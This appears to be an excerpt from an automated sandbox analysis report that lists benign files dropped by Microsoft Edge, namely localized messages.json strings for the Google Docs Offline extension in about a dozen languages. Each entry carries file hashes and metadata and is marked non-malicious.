                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):930
                                                                                                                                                                                                                                                            Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                            MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                            SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                            SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                            SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):913
                                                                                                                                                                                                                                                            Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                            MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                            SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                            SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                            SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):806
                                                                                                                                                                                                                                                            Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                            MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                            SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                            SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                            SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):883
                                                                                                                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                            MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                            SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                            SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                            SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1613
                                                                                                                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                            MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                            SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                            SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                            SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                            MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                            SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                            SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                            SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                            MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                            SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                            SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                            SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):959
                                                                                                                                                                                                                                                            Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                            MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                            SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                            SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                            SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                                                                                                            Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                            MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                            SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                            SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                            SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):838
                                                                                                                                                                                                                                                            Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                            MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                            SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                            SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                            SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                                                                                                            Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                            MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                            SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                            SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                            SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):911
                                                                                                                                                                                                                                                            Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                            MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                            SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                            SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                            SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                            Malicious:false
